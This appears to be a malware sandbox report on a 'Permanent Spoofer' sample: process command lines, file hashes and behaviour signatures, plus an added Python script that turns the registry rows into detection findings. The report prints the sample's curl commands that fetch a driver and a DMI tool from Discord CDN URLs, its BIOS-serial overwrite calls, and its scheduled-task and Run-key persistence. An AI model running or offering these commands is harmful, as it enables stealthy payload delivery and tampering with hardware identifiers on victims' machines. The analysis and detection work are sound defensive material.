C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BLC DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CM DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CS DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CA DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CSK DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /PSN DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /PAT DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /PPN DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 1 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 2 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 3 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 4 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 5 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 6 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 7 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 8 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 9 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 10 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 11 DHQX992121213-%RANDOM% >nul
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 20:19 /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 20:20 /f
Network
Files
memory/1956-0-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/1956-1-0x0000000077930000-0x0000000077932000-memory.dmp
\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe
| MD5 | 407f16d056d7bbfc4f50042565aaf71c |
| SHA1 | 183a360c72e6fe19e367acc3a63fc64b7b987747 |
| SHA256 | fcd04587bc69ac61f1d59897fb35f248a1f97a3549df838d00321d73d65fe570 |
| SHA512 | 6829e640918a28017e44c69647f8842825b5161b710afcee315c5afdad52248925912fb0614767d4b911712a7608a1a9a68a992a6121fcba2f785c131895e271 |
\Windows\Resources\Themes\icsys.icn.exe
| MD5 | 5036deedb789b134425f4412a6c49502 |
| SHA1 | 31e878b0f935e24ebe78dcfabbd4a11b0462c24e |
| SHA256 | 8c8dfe4cdba22f65f47851f9f5939fb31c02f8c67b1ed3de782557de6ef5d9fd |
| SHA512 | fa2a0e379164d130490037af4159bd8713b7d1265116eecb0339f0ef1ffc529764c31836ea46cdee1eb7dce0ad078b3aa86661081d1d71ecd208d4124ad650b6 |
memory/1956-14-0x00000000036D0000-0x0000000003CE6000-memory.dmp
memory/2488-15-0x0000000000400000-0x0000000000A16000-memory.dmp
\Windows\Resources\Themes\explorer.exe
| MD5 | 33b4643612c2024d567a61cd363b607c |
| SHA1 | dac235df23a784f3a035fe9bbe27338c754054a0 |
| SHA256 | 4363df19108eee01c3b3227d2b2c78a6d6446abcca788a0a08dd883f18a36063 |
| SHA512 | c7b7fbe502f400b996047ddc47311e54e76c0b1b789ca2257ca876d338daffb74cd5bbac80375aaf5d0084e88da3b236b98b1ad13a95cbd36216241c302f3af4 |
memory/2488-27-0x00000000036D0000-0x0000000003CE6000-memory.dmp
memory/2724-28-0x0000000000400000-0x0000000000A16000-memory.dmp
\Windows\Resources\spoolsv.exe
| MD5 | 7753d5d74580eb85af24ef15f66a0ec9 |
| SHA1 | aa921eec287f33136e837ed3562c3b83b760453c |
| SHA256 | 8abb1e90803db4485b73793b1712515f80c188bdef433cea9c1af4335ec010b3 |
| SHA512 | 15325d8fcaca3e42c5d935a2aa82bb4eb927cbe0947b2c2330a670a4064b51778c99d3ee7d6ab89757901816560eb8cea923c8e992dd0e6e7f061824304ca72f |
memory/2724-37-0x00000000036D0000-0x0000000003CE6000-memory.dmp
memory/2952-40-0x0000000000400000-0x0000000000A16000-memory.dmp
C:\Windows\Resources\svchost.exe
| MD5 | 6c0366b8162110104bb2703971420d8d |
| SHA1 | ae451d535bc73330032daaf6e607b6579221773c |
| SHA256 | cce819e3f3caacdca057281e0ecdedc217dce157fbdedbe19675e811d8f770ed |
| SHA512 | b3c8a18b9f11cacc43fedbaceaa0701f7d5bd90445a36cdfdc9eb2b73e1d3426f9a3a63c7182be76536ddb79dbf527078e2230fa3d3defeb1385c87be0c6be61 |
memory/1956-53-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/1988-52-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/2952-51-0x0000000003750000-0x0000000003D66000-memory.dmp
memory/2172-62-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/1988-60-0x0000000003340000-0x0000000003956000-memory.dmp
memory/1956-59-0x00000000036D0000-0x0000000003CE6000-memory.dmp
memory/2952-67-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/2172-69-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/2488-71-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/1956-73-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/2724-74-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/1988-75-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/2724-76-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/1988-77-0x0000000003340000-0x0000000003956000-memory.dmp
memory/2724-87-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/1988-88-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/2724-89-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/2724-99-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/1988-100-0x0000000000400000-0x0000000000A16000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-09-27 20:10
Reported
2024-09-27 20:19
Platform
win10v2004-20240802-en
Max time kernel
150s
Max time network
145s
Command Line
Signatures
Modifies visibility of hidden/system files in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | \??\c:\windows\resources\svchost.exe | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | \??\c:\windows\resources\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | \??\c:\windows\resources\spoolsv.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | \??\c:\windows\resources\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | \??\c:\windows\resources\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| N/A | N/A | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" | \??\c:\windows\resources\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" | \??\c:\windows\resources\svchost.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | \??\c:\windows\resources\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | \??\c:\windows\resources\spoolsv.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\explorer.exe | \??\c:\windows\resources\themes\explorer.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\explorer.exe | \??\c:\windows\resources\svchost.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| N/A | N/A | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\windows\resources\themes\explorer.exe | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| File opened for modification | \??\c:\windows\resources\spoolsv.exe | \??\c:\windows\resources\themes\explorer.exe | N/A |
| File created | C:\Windows\amifldrv64.sys | C:\Windows\system32\curl.exe | N/A |
| File opened for modification | \??\c:\windows\resources\svchost.exe | \??\c:\windows\resources\spoolsv.exe | N/A |
| File created | C:\Windows\AMIDEWINx64.EXE | C:\Windows\system32\curl.exe | N/A |
| File opened for modification | C:\Windows\Resources\tjud.exe | \??\c:\windows\resources\themes\explorer.exe | N/A |
| File opened for modification | C:\Windows\Resources\Themes\icsys.icn.exe | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\resources\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\discord-1086389167996547133\DefaultIcon | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\discord-1086389167996547133\shell | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\discord-1086389167996547133\shell\open\command\ = "c:\\users\\admin\\appdata\\local\\temp\\oh no\\permanent spoofer\\spoofer.exe\u00a0" | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\discord-1086389167996547133\shell\open\command | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\discord-1086389167996547133\shell\open | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\discord-1086389167996547133 | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\discord-1086389167996547133\ = "URL:Run game 1086389167996547133 protocol" | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\discord-1086389167996547133\URL Protocol | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\discord-1086389167996547133\DefaultIcon\ = "c:\\users\\admin\\appdata\\local\\temp\\oh no\\permanent spoofer\\spoofer.exe\u00a0" | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| N/A | N/A | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| N/A | N/A | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
Suspicious use of WriteProcessMemory
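The registry rows in the tables above are the part of this report a responder can act on directly. As an added example (my code, not the sandbox's or the sample's), the script below parses rows in the table format used on this page and sorts them into findings: RunOnce values that point into C:\Windows\Resources (persistence), the ShowSuperHidden=0 flip that keeps the dropped copies out of Explorer, the VirtualBox ACPI, BIOS-version and EnableLUA lookups (sandbox and UAC checks), and the discord-1086389167996547133 URL-protocol class. The default value "URL:Run game <id> protocol" is the string Discord's open-source RPC registration helper writes when a program registers for Rich Presence, so the handler is most likely a side effect of the spoofer using Discord RPC rather than a deliberate persistence trick; it still leaves a browser-reachable launch path for the Temp-folder binary, and in the win10 run the registered command ends in a U+00A0 that the script flags. The sample rows are copied from the tables on this page; the category names and the decoding of the JSON-style escaped values are my own assumptions.

```python
"""Added example: triage of registry rows from the Signatures tables above.

Not part of the sandbox report or of the sample. Row format is the Markdown
table used on this page; the finding categories are mine.
"""
import re

ROW_RE = re.compile(r"^\|\s*(?P<op>[^|]*?)\s*\|\s*(?P<ind>[^|]*?)\s*\|\s*(?P<proc>[^|]*?)\s*\|")
VALUE_RE = re.compile(r'^(?P<path>.*?)\s*=\s*"(?P<value>.*)"\s*$', re.S)
SID_RE = re.compile(r"S-1-5-21(?:-\d+)+")


def parse_row(row):
    """Parse one '| op | indicator | process | target |' row; None for headers/N/A rows."""
    m = ROW_RE.match(row.strip())
    if not m or m.group("op") in ("Description", "N/A"):
        return None
    ind, value = m.group("ind"), None
    v = VALUE_RE.match(ind)
    if v:
        ind = v.group("path")
        # The page shows values JSON-escaped ("c:\\windows", "\u00a0"); undo that.
        value = v.group("value").encode("ascii", "backslashreplace").decode("unicode_escape")
    return {
        "op": m.group("op"),
        "path": SID_RE.sub("<SID>", ind),  # drop the per-machine SID so rules port across runs
        "value": value,
        "process": m.group("proc"),
    }


def assess(rows):
    """Return (tag, path, value, process) findings for the rows that matter."""
    findings = []
    for r in filter(None, map(parse_row, rows)):
        p, v = r["path"].lower(), r["value"] or ""
        tag = None
        if re.search(r"\\currentversion\\run(once)?\\", p) and "\\windows\\resources\\" in v.lower():
            tag = "persistence.run_key_into_windows_resources"
        elif p.endswith("\\explorer\\advanced\\showsuperhidden") and v == "0":
            tag = "evasion.keep_protected_files_hidden"
        elif "\\hardware\\acpi\\dsdt\\vbox__" in p:
            tag = "discovery.virtualbox_acpi_table"
        elif p.endswith(("\\system\\systembiosversion", "\\system\\videobiosversion")):
            tag = "discovery.bios_version_strings"
        elif p.endswith("\\policies\\system\\enablelua"):
            tag = "discovery.uac_enabled"
        elif re.search(r"_classes\\discord-\d+\\shell\\open\\command\\?$", p):
            tag = "execution.url_protocol_handler"
            if "\u00a0" in v:  # trailing non-breaking space in the handler command (win10 run)
                findings.append(("anomaly.nbsp_in_handler_command", r["path"], v, r["process"]))
        elif re.search(r"_classes\\discord-\d+\\?$", p) and v.startswith("URL:Run game "):
            # String written by Discord's RPC register helper for Rich Presence apps.
            tag = "context.discord_rpc_registration"
        if tag:
            findings.append((tag, r["path"], v, r["process"]))
    return findings


# Rows copied from the Signatures tables on this page (behavioral2, win10).
ROWS = [
    "| Description | Indicator | Process | Target |",
    r'| Set value (int) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | \??\c:\windows\resources\themes\explorer.exe | N/A |',
    r'| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |',
    r'| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" | \??\c:\windows\resources\themes\explorer.exe | N/A |',
    r'| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | \??\c:\windows\resources\spoolsv.exe | N/A |',
    r'| Set value (str) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\discord-1086389167996547133\ = "URL:Run game 1086389167996547133 protocol" | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |',
    r'| Set value (str) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\discord-1086389167996547133\shell\open\command\ = "c:\\users\\admin\\appdata\\local\\temp\\oh no\\permanent spoofer\\spoofer.exe\u00a0" | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |',
]

if __name__ == "__main__":
    for tag, path, value, proc in assess(ROWS):
        print(f"{tag:45} {path}  {value!r}  <- {proc}")
```

The RunOnce rule matches on the value, not the key name, because the sample writes its entries under WOW6432Node (the dropped binaries are 32-bit) and names them "Explorer" and "Svchost"; a rule keyed on the path alone would need the redirected hive as well. On a live host the same checks translate to reading HKLM\SOFTWARE\WOW6432Node\...\RunOnce, HKCU\...\Explorer\Advanced\ShowSuperHidden and HKCU\Software\Classes\discord-* with whatever registry tooling is at hand.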
Processes
C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe
"C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe"
\??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe
"c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe "
C:\Windows\Resources\Themes\icsys.icn.exe
C:\Windows\Resources\Themes\icsys.icn.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c color 1
\??\c:\windows\resources\themes\explorer.exe
c:\windows\resources\themes\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1154954276758634506/1155262042295513219/amifldrv64.sys -o C:\Windows\amifldrv64.sys --silent
C:\Windows\system32\curl.exe
curl https://cdn.discordapp.com/attachments/1154954276758634506/1155262042295513219/amifldrv64.sys -o C:\Windows\amifldrv64.sys --silent
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1154954276758634506/1155262042731716658/AMIDEWINx64.EXE -o C:\Windows\AMIDEWINx64.EXE --silent
C:\Windows\system32\curl.exe
curl https://cdn.discordapp.com/attachments/1154954276758634506/1155262042731716658/AMIDEWINx64.EXE -o C:\Windows\AMIDEWINx64.EXE --silent
\??\c:\windows\resources\svchost.exe
c:\windows\resources\svchost.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /IVN DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /IV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /IV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SM DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SP DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SS DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SU AUTO >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SK DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SF DHQX992121213-%RANDOM% >nul
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe PR
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BM DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BP DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BS DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BT DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BLC DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CM DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CS DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
